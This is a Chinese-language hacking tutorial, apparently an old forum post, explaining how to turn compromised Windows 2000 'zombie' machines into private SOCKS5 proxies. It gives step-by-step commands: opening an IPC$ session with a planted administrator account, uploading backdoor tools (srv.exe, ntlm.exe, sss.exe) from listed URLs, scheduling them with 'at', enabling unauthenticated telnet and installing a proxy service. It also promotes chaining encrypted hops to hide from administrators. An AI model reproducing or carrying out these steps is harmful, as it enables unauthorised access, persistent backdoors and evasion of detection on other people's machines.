相信大家一定找了许多3389肉鸡了，呵呵（别做坏事哦）。我们一定不满足就用它来扫QQ吧，你有没有想过自己做个Sock5代理呢？是啊，现在的Sock5代理太难找了，尤其是用来给QQ加Sock5代理，呵呵。这只是一个方面哦。
那么如果你找到了个速度快的3389肉鸡？好，LET‘S GO,我们把它做成自己的Sock5代理。
恩，我喜欢用IPC$管道来做事情，呵呵，那么我们先来打开肉鸡的TELNET吧（方便嘛，要是你不能用IPC$，那等会在说）

******************************************************************
需要的软件：(先都下来吧)
srv.exe: http://www.sxren.net/tech/srv.exe
ntlm.exe: http://www.sxren.net/tech/ntlm.exe
snakeSksockserver.exe http://www.sxren.net/tech/sss.exe
SocksCap.exe http://www.sxren.net/tech/sockscap.exe
****************************************************************

一、启动肉鸡的TELNET。(win2000下使用)
一般说来，肉鸡的TELNET是不打开的，尤其需要认证，很讨厌呀。那我们就来打开它的TELNET。
例子：我们的目标肉鸡IP：10.10.10.10
我们作好的管理员：TsInternetUser 密码：1234
OK，我们打开cmd命令窗口建立IPC$管道：
————————————————————————————————-
c:\net use \\10.10.10.10\ipc$ "1234" /user:TsInternetUser
命令完成！
c:\_
—————————————————————————————-------
好了，通道建立好了，我们把srv.exe sss.exe ntlm.exe全部上传（假设你都下载到你的硬盘c:\下面了）
————————————————————————————————
c:\copy srv.exe \\10.10.10.10\admin$
1 files copied!
c:\copy ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\copy sss.exe \\10.10.10.10\admin$
1 files copied!
——————————————————————————————————
OK，都复制完毕！我们继续，先打开一个我们自己的telnet(srv.exe)
——————————————————————————————————
　　　　　　 先看看时间：
c:\net time \\10.10.10.10
显示：
　　　　　　 c:\\\10.10.10.10 的当前时间是 2001/11/18 下午 08:55
命令完成，我们来启动srv.exe
c:\at \\10.10.10.10 09:00 srv.exe
显示：
新加了一项作业，其作业 ID=1
好了，我们等到09：01后。来连接肉鸡：
c:\telnet 10.10.10.10 99
我们不需要身份验证就可以上去了。显示为：
c:\winnt\system32>
好了，接着我们在这个TELNET窗口打开NTLM.exe
c:\winnt\system32>ntlm（不会显示你的输入，仔细打命令哦）
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
C:\WINNT\system32>
YEAH！！！，我们现在来启动WIN2000自己的TELNET。首先我们终止srv.exe的telnet服务：
C:\WINNT\system32>net stop telnet（不会显示你的输入，仔细打命令哦）
系统会说你没有启动telnet服务，呵呵，不理他，继续：
C:\WINNT\system32>net start telnet（不会显示你的输入，仔细打命令哦）
这次真的启动TELNET了！！，我们另开一个命令（DOS）窗口就可以telnet到肉鸡上了.
——————————————————————————————

二、我们开始做自己的Sock5代理：）
关于snake的snakeSksockserver.exe我就不介绍了，这是个很好的制作代理跳板的东东，最大可以255级连跳哦：）
好了，我们先前已经把snakeSksockserver.exe 该名成sss.exe并且传到了肉鸡10.10.10.10的admin$下面了，我们现在也打开了它的TELNET，OK，我们来登陆
—————————————————————————————————
c:>telnet 10.10.10.10
Microsoft (R) Windows 2000 (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Client
Telnet Client Build 5.00.99203.1

Escape Character is ‘CTRL+]‘
You are about to send your password inforation to a remote computer
in Internet zone. This might not be safe. Do you want to send it anyway(y/n):y
NTLM Authentication failed due to insufficient credentials.
Please login with
clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1

login: TsInternetUser
password: ****
*==========================================================
Microsoft Telnet
*==========================================================
c:>
——————————————————————————————————
好了，我们来看看怎么做代理：
____________________________________________________________________
c:>sss.exe -install <---------开始安装
显示：
c:>sksockserver installed!
来看看配置：
c:>sss -config show
显示：
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual <---服务启动方式
SkServer Enable Client Set Num:0 <---客户端的项目个数
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数

来启动服务：
c:>net start skserver
提示你正在启动，并且完成。
来检查一下是不是启动了：
c:>net start 《--------------看看启动的服务列表
These Windows 2000 services are started:

......
Print Spooler
Server
Snake SockProxy Service <---------------就是它哦，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
———————————————————————————————
好了，到这里我们已经做好了一个socks5代理了，我们自己的哦.OK，下面我们用sockscap来使用我们做代理。

三、用SocksCap来用代理。
下载安装好SocksCap后，我们在桌面上打开SocksCap V2，如图1
http://www.sxren.net/tech/sock1.jpg
看到File选项了吗？，点开他选Settings...弹出卡片，如图2
http://www.sxren.net/tech/sock2.gif
在 SOCKS Server里面我们填肉鸡的IP：10.10.10.10，PortT填默认的1813断口哦。
下面的我们选socks version 5，呵呵，和 Attempt local then remot,这是域名解析的顺序，先本地，然后才远程。
设置完了点“确定”我们就可以使用了，哈。本来sockscap2.2版本支持拖放，就是说你把Ie的图标直接拖到sockscap
小窗口里就好了，可我没找到，就先用2.1的吧：）
添加应用程序到sockscap里面，看到sockscap里面那个"new"按钮了吗？点开它，会弹出一个卡片，
Profile name ：名字，自己随便写啦，比如我们要把IE加进去，就写IE
Command Line: 命令行，点后面的Browse...找到你的IE的程序路径，一般在c:\Program Files\Internet Explorer\IEXPLORE.EXE
Working:填好上面那个，这个就自动加上了.
这样我们就把IE加到SocksCap里面了，我们继续添几个东西进去。如图：
http://www.sxren.net/tech/sock3.jpg
我们可以双击里面的程序来使用，也可以选住程序在点"Run"来运行.

四、我 用不成ipc$管道怎么办？？
其实我打开肉鸡的telnet是可以用来做跳板的，比如我们telnet倒10.10.10.10上 在telnet倒其他目标及其上^^来隐藏你的来源哦 .
不是2000的机器,就直接在肉鸡上用ie下载sss.exe，在肉鸡上打开命令窗口来安装sock5代理把，呵呵。

代理就写到这，和和,本想不介绍snakeSksockserver的，可实在认为这是个好东西，就贴点介绍在下面给大家看：

*********************************************************************
1.与普通的Sock代理程序相比它支持多跳板之间的连续跳，
而它却可支持最多达255个跳板之间的连跳运动，
2. 普通的Sock代理程序之间的数据传输是不加密的，
而它支持的跳板之间传输的数据是经过动态加密的，
也就是说每次传输过程中，数据加密的方式都不相同。
就算你不幸在hacking的过程中被webmaster发现，
普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗，
而恰巧你用的是它的话，webmaster将会看到一堆乱码！
3.普通的sock代理程序在设置上比较烦琐，而它只用两步就行了，
普通的sock代理程序要不然只支持Tcp或Udp的连接，很少有二者兼顾的，
而它却全部支持（可以用它上QQ哟!）
4.普通的sock代理程序都是大胖子，而SSS的体积只有－72K
(实在佩服snake的编程能力，能将这样一个sock代理只写了这么小的体积，
可见功底深厚,不愧是高手的作品!）

还是画个功能示意图吧:

加密数据 加密数据 普通数据 sss
[]=======[]=======[]=======[]========[]=：：：=[]=======[]
工作站 跳板1 跳板2 跳板3 跳板4 跳板N 目标机